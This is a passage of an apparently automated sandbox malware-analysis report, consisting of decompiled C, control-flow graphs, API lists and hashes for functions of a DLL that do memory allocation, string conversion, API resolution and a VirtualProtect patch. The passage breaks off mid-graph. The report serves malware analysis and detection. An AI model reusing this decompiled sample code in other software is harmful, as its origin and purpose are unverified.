                                                            0x73bc2371
                                                            0x00000000
                                                            0x73bc2371
                                                            0x73bc231b
                                                            0x00000000
                                                            0x73bc2321
                                                            0x73bc2323
                                                            0x73bc232c
                                                            0x00000000
                                                            0x73bc232c
                                                            0x73bc231b
                                                            0x73bc2901
                                                            0x73bc2907
                                                            0x73bc290d
                                                            0x73bc2911
                                                            0x73bc2a8a
                                                            0x73bc2a93
                                                            0x73bc2925
                                                            0x73bc2927
                                                            0x73bc292a
                                                            0x73bc29b5
                                                            0x73bc29b5
                                                            0x73bc29b8
                                                            0x73bc29ba
                                                            0x73bc29d7
                                                            0x73bc29dd
                                                            0x73bc29e3
                                                            0x73bc29e5
                                                            0x73bc29fc
                                                            0x73bc29fc
                                                            0x73bc29fc
                                                            0x73bc2a04
                                                            0x73bc2a09
                                                            0x73bc2a11
                                                            0x73bc2a13
                                                            0x73bc2a15
                                                            0x73bc2a18
                                                            0x73bc2a1a
                                                            0x73bc2a21
                                                            0x73bc2a27
                                                            0x73bc2a29
                                                            0x73bc2a2b
                                                            0x73bc2a30
                                                            0x73bc2a42
                                                            0x73bc2a42
                                                            0x73bc2a30
                                                            0x73bc2a29
                                                            0x73bc2a18
                                                            0x73bc2a48
                                                            0x73bc2a4c
                                                            0x73bc2a56
                                                            0x73bc2a57
                                                            0x73bc2a5f
                                                            0x73bc2a61
                                                            0x73bc2a6b
                                                            0x73bc2a72
                                                            0x73bc2a74
                                                            0x73bc2a7e
                                                            0x73bc2a84
                                                            0x73bc2a84
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2a86
                                                            0x73bc2a86
                                                            0x73bc2a86
                                                            0x73bc2a86
                                                            0x00000000
                                                            0x73bc2a86
                                                            0x73bc2a76
                                                            0x73bc2a76
                                                            0x00000000
                                                            0x73bc2a4e
                                                            0x73bc2a4e
                                                            0x73bc2a54
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2a54
                                                            0x73bc2a4c
                                                            0x73bc29e8
                                                            0x73bc29ee
                                                            0x73bc29f4
                                                            0x73bc29f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc29f6
                                                            0x73bc29bc
                                                            0x73bc29c3
                                                            0x73bc29c9
                                                            0x73bc29cf
                                                            0x00000000
                                                            0x73bc29cf
                                                            0x73bc2930
                                                            0x73bc2933
                                                            0x73bc299b
                                                            0x73bc299b
                                                            0x73bc29a1
                                                            0x73bc29a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc29a9
                                                            0x73bc29aa
                                                            0x00000000
                                                            0x73bc29af
                                                            0x73bc2938
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc293e
                                                            0x73bc293e
                                                            0x73bc2941
                                                            0x73bc2947
                                                            0x73bc2949
                                                            0x73bc2952
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2958
                                                            0x73bc2960
                                                            0x73bc2965
                                                            0x73bc296c
                                                            0x73bc2975
                                                            0x73bc297b
                                                            0x73bc2981
                                                            0x73bc2994
                                                            0x00000000
                                                            0x73bc2994

                                                            APIs
                                                              • Part of subcall function 73BC12C6: GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73BC27C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73BC281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73BC286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73BC2876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2887
                                                            • GlobalFree.KERNEL32(?), ref: 73BC2901
                                                            • GlobalFree.KERNEL32(?), ref: 73BC2907
                                                            • GlobalFree.KERNEL32(?), ref: 73BC290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73BC29D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73BC29E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73BC2A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73BC2A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: e64a3c643e0aed5a5e2b50da46895ad340ca0ff95b93fe2651b0605017c3d653
                                                            • Instruction ID: 9e7650a213328e163d882ea63215d56a40490c1be74f1fc18884e0671142031d
                                                            • Opcode Fuzzy Hash: e64a3c643e0aed5a5e2b50da46895ad340ca0ff95b93fe2651b0605017c3d653
                                                            • Instruction Fuzzy Hash: C932B571A0838A9FEB26CF34C48075AB7F5FF88314F14863EE596DA294E730D9458B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC19C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 222 73bc19c7-73bc19d5 223 73bc1a1e-73bc1a21 222->223 224 73bc19d7-73bc1a18 VirtualProtect 222->224 224->223
                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73bc5014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73bc501c, 4, 0x40, 0x73bc5034); // executed
					 *0x73bc501c = 0xc2;
					 *0x73bc5034 = 0;
					 *0x73bc5030 = 0;
					 *0x73bc502c = 0;
					 *0x73bc5028 = 0;
					 *0x73bc5024 = 0;
					 *0x73bc5020 = 0;
					 *0x73bc501e = 0;
				}
				return 1;
			}



                                                            0x73bc19d0
                                                            0x73bc19d5
                                                            0x73bc19e5
                                                            0x73bc19ed
                                                            0x73bc19f4
                                                            0x73bc19fa
                                                            0x73bc1a00
                                                            0x73bc1a06
                                                            0x73bc1a0c
                                                            0x73bc1a12
                                                            0x73bc1a18
                                                            0x73bc1a18
                                                            0x73bc1a21

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73BC501C,00000004,00000040,73BC5034), ref: 73BC19E5
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 646af9e945543cd39fea8abedead44defc7b5d0b155eb92cde77817f4815e81e
                                                            • Instruction ID: b5ccdb9ed94a7068b5bb90b6a51d8bd4c8242b23d677c7c9aef15190421998e7
                                                            • Opcode Fuzzy Hash: 646af9e945543cd39fea8abedead44defc7b5d0b155eb92cde77817f4815e81e
                                                            • Instruction Fuzzy Hash: 1DF098F2919344DAC339AF1B9A847263AA0B71D345B20452FF65DEBB41C33081009B9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC12C6 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 225 73bc12c6-73bc12d4 GlobalAlloc
                                                            C-Code - Quality: 100%
                                                            			E73BC12C6() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x73bc5040); // executed
				return _t1;
			}




                                                            0x73bc12ce
                                                            0x73bc12d4

                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: da11e5099e440407dd1ee7c37fd3cff2bad1db417223f71a2c6650b113b55ccf
                                                            • Instruction ID: 2d2157cf1fe414a902d04a9d8f6ffc60189ff9f7dd2a1a3ea9d20440416ab6ae
                                                            • Opcode Fuzzy Hash: da11e5099e440407dd1ee7c37fd3cff2bad1db417223f71a2c6650b113b55ccf
                                                            • Instruction Fuzzy Hash: 9AA002B35801109BDF727B93AB6EF283A32B74C701F740045E30DAB89087791110DB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 73BC2128 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 226 73bc2128-73bc2147 call 73bc12c6 229 73bc2149-73bc214e 226->229 230 73bc2154 229->230 231 73bc2150-73bc2152 229->231 232 73bc2156-73bc215d 230->232 231->232 233 73bc2211-73bc2215 232->233 234 73bc2163 232->234 235 73bc222e-73bc2233 233->235 236 73bc2217-73bc221d 233->236 237 73bc219f-73bc21ae lstrcpynA 234->237 238 73bc21d8-73bc21fe WideCharToMultiByte 234->238 239 73bc216a-73bc216d 234->239 240 73bc21b0-73bc21d6 StringFromGUID2 WideCharToMultiByte 234->240 241 73bc2200 234->241 242 73bc2172-73bc2176 234->242 243 73bc2192-73bc219d call 73bc144d 234->243 246 73bc2235-73bc2238 235->246 247 73bc2250-73bc2256 235->247 244 73bc221f-73bc2223 236->244 245 73bc2225-73bc2228 GlobalFree 236->245 237->233 238->233 239->233 240->233 251 73bc2202-73bc2208 wsprintfA 241->251 248 73bc218f-73bc2190 242->248 249 73bc2178-73bc2188 242->249 256 73bc220e 243->256 244->235 244->245 245->235 252 73bc223a 246->252 253 73bc2242-73bc2244 246->253 247->229 255 73bc225c-73bc2267 GlobalFree 247->255 248->251 249->248 251->256 257 73bc223b call 73bc157e 252->257 253->247 258 73bc2246-73bc224e call 73bc15c7 253->258 256->233 259 73bc2240 257->259 261 73bc224f 258->261 259->261 261->247
                                                            C-Code - Quality: 71%
                                                            			E73BC2128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E73BC12C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M73BC2268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x73bc4060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x73bc4080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E73BC144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x73bc5040);
								goto L17;
							case 4:
								__ecx =  *0x73bc5040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x73bc5040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73bc5040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73bc4058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E73BC15C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E73BC157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}










                                                            0x73bc2136
                                                            0x73bc2138
                                                            0x73bc213b
                                                            0x73bc2147
                                                            0x73bc2149
                                                            0x73bc214e
                                                            0x73bc214e
                                                            0x73bc2156
                                                            0x73bc215d
                                                            0x73bc2163
                                                            0x00000000
                                                            0x73bc216a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2172
                                                            0x73bc2176
                                                            0x73bc2178
                                                            0x73bc2179
                                                            0x73bc2184
                                                            0x73bc2188
                                                            0x73bc2188
                                                            0x73bc218f
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2192
                                                            0x73bc2193
                                                            0x73bc2196
                                                            0x73bc2198
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc21a8
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc21d8
                                                            0x73bc21ee
                                                            0x73bc21f4
                                                            0x73bc21f9
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc21b0
                                                            0x73bc21b2
                                                            0x73bc21b5
                                                            0x73bc21b6
                                                            0x73bc21b8
                                                            0x73bc21be
                                                            0x73bc21ca
                                                            0x73bc21d0
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2200
                                                            0x73bc2202
                                                            0x73bc2208
                                                            0x73bc220e
                                                            0x73bc220e
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2163
                                                            0x73bc2211
                                                            0x73bc2215
                                                            0x73bc2228
                                                            0x73bc2228
                                                            0x73bc222e
                                                            0x73bc2233
                                                            0x73bc2238
                                                            0x73bc2244
                                                            0x73bc2249
                                                            0x00000000
                                                            0x73bc224e
                                                            0x73bc223a
                                                            0x73bc223b
                                                            0x73bc224f
                                                            0x73bc224f
                                                            0x73bc2238
                                                            0x73bc2250
                                                            0x73bc2253
                                                            0x73bc2253
                                                            0x73bc2267

                                                            APIs
                                                              • Part of subcall function 73BC12C6: GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC225D
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 53e94efa30f1554ffb3b279168e66a12a5a2948eb1826c26541a0eee3719f34f
                                                            • Instruction ID: 1822a239cd5709e78889ce9cdc684f0768000826b5cfcfa7cc46a353f19eb0dd
                                                            • Opcode Fuzzy Hash: 53e94efa30f1554ffb3b279168e66a12a5a2948eb1826c26541a0eee3719f34f
                                                            • Instruction Fuzzy Hash: 2F41BF72644188AFEB369F55CE85F2A7BBAFB49300F144139E906EF580E731E940CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC1F58 Relevance: 9.1, APIs: 6, Instructions: 134memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 263 73bc1f58-73bc1f6a 264 73bc1f6d-73bc1f7f 263->264 265 73bc1faf-73bc1fb4 call 73bc12af 264->265 266 73bc1f81-73bc1f84 264->266 269 73bc1fb9 265->269 266->265 268 73bc1f86-73bc1f89 266->268 270 73bc1f8b-73bc1f90 call 73bc152b 268->270 271 73bc1f92-73bc1f98 268->271 272 73bc1fba 269->272 270->272 274 73bc1f9a-73bc1fa0 call 73bc14e2 271->274 275 73bc1fa2-73bc1fad 271->275 276 73bc1fbc-73bc1fc7 272->276 274->269 275->276 279 73bc1fc9-73bc1fcf 276->279 280 73bc1fd1 276->280 282 73bc1fd7-73bc1fee 279->282 280->282 283 73bc20dc-73bc20e9 GlobalFree 282->283 284 73bc1ff4 282->284 285 73bc20eb-73bc20fb 283->285 286 73bc2100-73bc2106 283->286 287 73bc2028-73bc202e call 73bc12af 284->287 288 73bc2038-73bc2065 GlobalAlloc MultiByteToWideChar 284->288 289 73bc1ffb-73bc2002 284->289 290 73bc2016-73bc2023 call 73bc1326 284->290 291 73bc2096-73bc2099 284->291 292 73bc2007-73bc200d call 73bc1326 284->292 293 73bc20b2-73bc20d9 call 73bc144d 284->293 285->264 302 73bc202f-73bc2036 287->302 295 73bc2067-73bc208e GlobalAlloc CLSIDFromString GlobalFree 288->295 296 73bc2090-73bc2094 288->296 289->283 290->283 291->283 297 73bc209b-73bc20b0 call 73bc1326 call 73bc1958 291->297 307 73bc200e-73bc2011 292->307 293->283 295->283 296->302 297->283 302->307 307->283
                                                            C-Code - Quality: 77%
                                                            			E73BC1F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60);
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t43 = _t57 + 1; // 0x2
								_t55 =  !=  ? _t43 : 0;
								_t46 =  !=  ? _t43 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M73BC2108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E73BC1326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E73BC1326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E73BC12AF(__esi);
										goto L21;
									case 4:
										 *0x73bc5040 =  *0x73bc5040 +  *0x73bc5040;
										__eax = GlobalAlloc(0x40,  *0x73bc5040 +  *0x73bc5040);
										__ecx =  *0x73bc5040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73bc5040, __eax,  *0x73bc5040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E73BC1326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73bc5040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73bc5040 +  *0x73bc5038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E73BC144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E73BC14E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E73BC152B();
					goto L10;
					L8:
					_t47 = E73BC12AF(0x73bc40c7);
					goto L9;
				}
			}














                                                            0x73bc1f5b
                                                            0x73bc1f6a
                                                            0x73bc1f6d
                                                            0x73bc1f6f
                                                            0x73bc1f73
                                                            0x73bc1f76
                                                            0x73bc1f7f
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1f89
                                                            0x73bc1f92
                                                            0x73bc1f98
                                                            0x73bc1fa2
                                                            0x73bc1fbc
                                                            0x73bc1fc4
                                                            0x73bc1fc7
                                                            0x73bc1fc7
                                                            0x73bc1fd7
                                                            0x73bc1fdf
                                                            0x73bc1fe7
                                                            0x73bc1fee
                                                            0x73bc20dc
                                                            0x73bc20dd
                                                            0x73bc20e3
                                                            0x73bc20e9
                                                            0x73bc2106
                                                            0x73bc2106
                                                            0x73bc20ed
                                                            0x73bc20f6
                                                            0x73bc20f9
                                                            0x00000000
                                                            0x73bc1ff4
                                                            0x73bc1ff4
                                                            0x00000000
                                                            0x73bc1ffb
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2007
                                                            0x73bc2008
                                                            0x73bc200d
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2016
                                                            0x73bc2017
                                                            0x73bc201c
                                                            0x73bc201d
                                                            0x73bc2020
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2029
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc203d
                                                            0x73bc2042
                                                            0x73bc2048
                                                            0x73bc2056
                                                            0x73bc205a
                                                            0x73bc2065
                                                            0x73bc2090
                                                            0x73bc202f
                                                            0x73bc202f
                                                            0x73bc200e
                                                            0x73bc200e
                                                            0x00000000
                                                            0x73bc200e
                                                            0x73bc206b
                                                            0x73bc2071
                                                            0x73bc2078
                                                            0x73bc207c
                                                            0x73bc207d
                                                            0x73bc207e
                                                            0x73bc2081
                                                            0x73bc2088
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2099
                                                            0x73bc209b
                                                            0x73bc209c
                                                            0x73bc20a9
                                                            0x73bc20a9
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc20b9
                                                            0x73bc20ba
                                                            0x73bc20c1
                                                            0x73bc20c7
                                                            0x73bc20c8
                                                            0x73bc20cb
                                                            0x73bc20d1
                                                            0x73bc20d2
                                                            0x73bc20d3
                                                            0x73bc20d4
                                                            0x73bc20d9
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1ff4
                                                            0x73bc1fee
                                                            0x73bc1f9b
                                                            0x73bc1fb9
                                                            0x73bc1fba
                                                            0x73bc1fba
                                                            0x00000000
                                                            0x73bc1fba
                                                            0x73bc1f8b
                                                            0x00000000
                                                            0x73bc1faf
                                                            0x73bc1fb4
                                                            0x00000000
                                                            0x73bc1fb4

                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC20DD
                                                              • Part of subcall function 73BC12AF: lstrcpynA.KERNEL32(00000000,?,73BC1502,?,73BC11C4,-000000A0), ref: 73BC12BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC2042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73BC205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73BC206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73BC2081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2088
                                                              • Part of subcall function 73BC1958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73BC20A7,00000000,?), ref: 73BC198A
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: 1b54ee95f384f9c1a6e4c77d21887fbe14543a114efee13af91e2d4d803323ce
                                                            • Instruction ID: 090fb230dd0c3b2eb48f0659bd4336271a654ece9b6e429e1de5a153c7d3433e
                                                            • Opcode Fuzzy Hash: 1b54ee95f384f9c1a6e4c77d21887fbe14543a114efee13af91e2d4d803323ce
                                                            • Instruction Fuzzy Hash: D941B5B1505285EFE736AF24D4447AAB7E9FF84311F14823AE849EB186DB30D540CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC1C2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 199COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 311 73bc1c2b-73bc1c77 call 73bc152b call 73bc1326 call 73bc152b 318 73bc1cad-73bc1cb1 311->318 319 73bc1c79-73bc1c80 311->319 320 73bc1cb5-73bc1cbb 318->320 319->318 321 73bc1c82-73bc1cab call 73bc152b call 73bc1326 GlobalFree 319->321 323 73bc1cc1 320->323 324 73bc1da3-73bc1da6 320->324 321->320 326 73bc1d6a-73bc1d6e 323->326 327 73bc1cc7-73bc1cca 323->327 328 73bc1dac-73bc1daf 324->328 329 73bc1e3b-73bc1e3f 324->329 330 73bc1d87-73bc1d94 call 73bc2fb0 326->330 331 73bc1d70-73bc1d85 326->331 335 73bc1cd0-73bc1cd3 327->335 336 73bc1d61 327->336 337 73bc1e2c-73bc1e2e 328->337 338 73bc1db1-73bc1db4 328->338 332 73bc1e55-73bc1e57 329->332 333 73bc1e41-73bc1e47 call 73bc3090 329->333 339 73bc1d96-73bc1d9b 330->339 331->339 343 73bc1e5d 332->343 344 73bc1d1a-73bc1d27 332->344 351 73bc1e4c-73bc1e50 333->351 335->326 345 73bc1cd9-73bc1cdc 335->345 348 73bc1d63 336->348 337->344 349 73bc1e34-73bc1e36 337->349 346 73bc1df8-73bc1dfc 338->346 347 73bc1db6-73bc1db9 338->347 354 73bc1d9d-73bc1da1 339->354 355 73bc1d2b-73bc1d3b call 73bc144d 339->355 356 73bc1e5f-73bc1e61 343->356 357 73bc1e67-73bc1e6c 343->357 344->355 358 73bc1cde-73bc1ce1 345->358 359 73bc1d08-73bc1d0c 345->359 352 73bc1dfe-73bc1e08 346->352 353 73bc1e18-73bc1e1a 346->353 360 73bc1def-73bc1df3 347->360 361 73bc1dbb-73bc1dbe 347->361 348->344 362 73bc1d65 348->362 349->348 351->355 365 73bc1e0a-73bc1e0f call 73bc30e0 352->365 366 73bc1e11-73bc1e16 call 73bc30b0 352->366 353->344 368 73bc1e20 353->368 354->355 387 73bc1d3c call 73bc157e 355->387 356->344 356->357 357->355 369 73bc1cfa-73bc1d03 call 73bc2ed0 358->369 370 73bc1ce3-73bc1ce6 358->370 363 73bc1d0e-73bc1d10 359->363 364 73bc1d5b-73bc1d5f 359->364 360->355 371 73bc1dc0-73bc1dc4 361->371 372 73bc1dd3-73bc1dd7 361->372 362->357 363->344 374 73bc1d12-73bc1d14 363->374 364->355 365->351 366->351 368->357 378 73bc1e22-73bc1e24 368->378 369->351 379 73bc1ce8-73bc1cec 370->379 380 73bc1cf4-73bc1cf8 370->380 371->355 381 73bc1dca-73bc1dce 371->381 382 73bc1dd9-73bc1ddb 372->382 383 73bc1de6-73bc1dea 372->383 374->344 374->357 378->344 388 